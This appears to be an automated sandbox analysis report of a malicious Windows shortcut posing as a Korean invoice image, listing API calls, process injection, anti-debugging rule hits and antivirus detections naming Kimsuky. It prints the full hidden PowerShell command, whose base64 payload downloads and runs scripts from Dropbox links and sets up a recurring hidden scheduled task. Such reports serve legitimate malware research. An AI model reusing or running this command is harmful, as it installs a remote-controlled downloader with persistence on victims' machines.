NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b0000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b1000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b2000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b3000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b4000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b5000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b6000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b7000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b8000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050b9000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050ba000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050bb000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050bc000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050bd000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050be000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050bf000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050c0000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050c1000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050c2000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050c3000  allocation_type: 4096 (MEM_COMMIT)
NtAllocateVirtualMemory  region_size: 4096  heap_dep_bypass: 1  base_address: 0x050c4000  allocation_type: 4096 (MEM_COMMIT)

file C:\Users\test22\AppData\Roaming\chrome.ps1
file C:\Users\test22\AppData\Roaming\user.ps1
file C:\Users\test22\AppData\Local\Temp\도양기업 20240610 송장 갑지.bmp.lnk
cmdline "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyXhSAyMDI0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9xdW82M3FtOGQzaXFsaG1weWliN3AvMjAyNDA2MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeGl5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaGhoOyAkcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNhZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRqendzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJHBwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2luZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3M3ZDZhd2lkNTh4cjg5aHRsbnl5Yy8wNjEwc2FmZS1mLnR4dD9ybGtleT1lcXhiY2gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
API: CreateProcessInternalW
Arguments:
  thread_identifier: 2216
  thread_handle: 0x00000334
  process_identifier: 2204
  current_directory: C:\Users\test22\AppData\Local\Temp
  filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  track: 1
  command_line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"...\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
  filepath_r: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  stack_pivoted: 0
  creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
  inherit_handles: 0
  process_handle: 0x0000033c
Status: 1  Return: 1  Repeated: 0
API: LookupPrivilegeValueW
Arguments:
  system_name:
  privilege_name: SeDebugPrivilege
Status: 1  Return: 1  Repeated: 0
rule DebuggerCheck__GlobalFlags: (no description)
rule DebuggerCheck__QueryInfo: (no description)
rule DebuggerHiding__Thread: (no description)
rule DebuggerHiding__Active: (no description)
rule ThreadControl__Context: (no description)
rule SEH__vectored: (no description)
rule anti_dbg: Checks if being debugged
rule disable_dep: Bypass DEP
Process injection Process 3012 resumed a thread in remote process 2204
API: NtResumeThread
Arguments:
  thread_handle: 0x00000334
  suspend_count: 1
  process_identifier: 2204
Status: 1  Return: 0  Repeated: 0
option -executionpolicy bypass: Attempts to bypass execution policy
option -nop: Does not load current user profile
option -windowstyle hidden: Attempts to execute command with a hidden window
option -noninteractive: Prevents creating an interactive prompt for the user
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.WinLNK.Pantera.4!c
CAT-QuickHeal Lnk.trojan.A12626210
Skyhigh BehavesLike.Trojan.fl
VIPRE Heur.BZC.YAX.Pantera.10.6C912DC4
Arcabit Heur.BZC.YAX.Pantera.10.6C912DC4
Symantec Scr.Mallnk!gen1
ESET-NOD32 LNK/Kimsuky.K
McAfee Artemis!09B1213C8A33
Avast LNK:Agent-EL [Trj]
Kaspersky HEUR:Trojan.Multi.Powecod.a
BitDefender Heur.BZC.YAX.Pantera.10.6C912DC4
MicroWorld-eScan Heur.BZC.YAX.Pantera.10.6C912DC4
Rising Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Emsisoft Heur.BZC.YAX.Pantera.10.6C912DC4 (B)
FireEye Heur.BZC.YAX.Pantera.10.6C912DC4
Sophos Troj/DownLnk-AY
SentinelOne Static AI - Suspicious LNK
Google Detected
MAX malware (ai score=87)
Kingsoft Script.Troj.CMDLnk.22143
ZoneAlarm HEUR:Trojan.Multi.Powecod.a
GData Heur.BZC.YAX.Pantera.10.6C912DC4
VBA32 Trojan.Link.Crafted
Ikarus BZC.YAX.Pantera
Tencent Win32.Trojan.Powecod.Ymhl
huorong TrojanDownloader/LNK.Netloader.e
AVG LNK:Agent-EL [Trj]
alibabacloud Trojan:Win/Kimsuky.K